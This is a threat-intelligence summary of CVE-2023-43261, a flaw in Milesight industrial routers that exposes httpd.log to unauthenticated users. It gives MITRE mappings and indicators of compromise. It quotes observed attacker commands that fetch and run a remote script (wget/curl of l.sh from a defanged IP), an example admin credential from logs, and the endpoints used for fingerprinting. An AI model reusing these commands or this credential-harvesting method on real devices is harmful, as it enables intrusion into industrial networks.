CVE-2023-43261 likely saw in-the-wild exploitation of Milesight industrial cellular routers, but not at scale, and the CVE description itself is incomplete and sometimes inaccurate. A real-world write-up shows the flaw allowed remote access to the router’s web interface and credential leakage, yet most affected devices have been patched for years. #Milesight #CVE-2023-43261 #IndustrialRouters #ICS #DarkIoT
Keypoints
- The CVE-2023-43261 vulnerability affected Milesight UR series routers and involves information disclosure via the httpd.log exposed to remote unauthenticated access.
- The CVE description is inconsistent, misidentifying affected models and firmware versions; patched firmware versions exist for years, but documentation was wrong.
- The vulnerability enables attackers to retrieve credentials logged by the router (web, VPN, wireless keys, DDNS, etc.), potentially enabling pivot to ICS networks.
- An unauthenticated /islogin endpoint reveals model and version, aiding fingerprinting and targeted attempts.
- Real-world activity shows limited, non-mass exploitation: several login attempts from various IPs, with some first-attempt successes using credentials found in httpd.log.
- Despite patching, small-scale exploitation and credential exposure were observed, and defenders are advised to reset credentials and restrict internet exposure of these routers.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The router exposes httpd.log to remote unauthenticated attackers via the web interface. [‘the router exposes its httpd.log to remote and unauthenticated attackers via the web interface.’]
- [T1082] System Information Discovery – The router responds to an unauthenticated HTTP request to /islogin with a detailed description of the model and version. [‘The router responds to an unauthenticated HTTP request to /islogin with a detailed description of the model and version.’]
- [T1552.001] Credentials In Files – The device logs web credentials, VPN credentials, wireless keys, and other sensitive data in httpd.log. [‘web credentials, vpn credentials, wireless keys, ddns credentials, etc.’]
- [T1133] External Remote Services – VPN configuration on the router can be misused to pivot into the ICS network. [‘the router logs a lot of things it shouldn’t… and the web interface allows the user to configure vpn servers and drop firewall protections… so once you have credentials, it’s fairly easy to access the ICS network from the internet.’]
- [T1562.004] Impair Defenses: Modify Firewall – Attacker activity includes opening up or weakening firewall protections via VPN configurations. [‘opening up the firewall (this is 200.73.18.40 going after a system in Canada)’]
- [T1059] Command and Scripting Interpreter – Use of the l.sh script downloaded from a remote host as part of exploitation chain. [‘wget+http://194.180.48[.]100/l.sh’; ‘curl+-O+http://194.180.48[.]100/l.sh’; ‘sh+l.sh’]
Indicators of Compromise
- [IP Address] context – login attempts from internet-facing systems observed; examples include 5.61.39.232, 200.73.18.40, and 103.83.144.161 (France, Lithuania, Norway geolocations) indicating credentialed access attempts
- [IP Address] context – additional observed IPs in logs and attempts include 103.83.144.161 and 5.61.39.232
- [URL] context – a notable example where a script was retrieved: http://194.180.48[.]100/l.sh
- [File] context – httpd.log contains credentials (web, VPN, wireless, DDNS) and is referenced in logs
- [File] context – l.sh referenced in the exploit chain (downloaded/used via curl/wget)
- [Credential] context – example credential pair shown in logs: {“username”:”admin”,”password”:”rIuWTTKEjXPXY3oAN7V2kQ==”}
Read more: https://vulncheck.com/blog/real-world-cve-2023-43261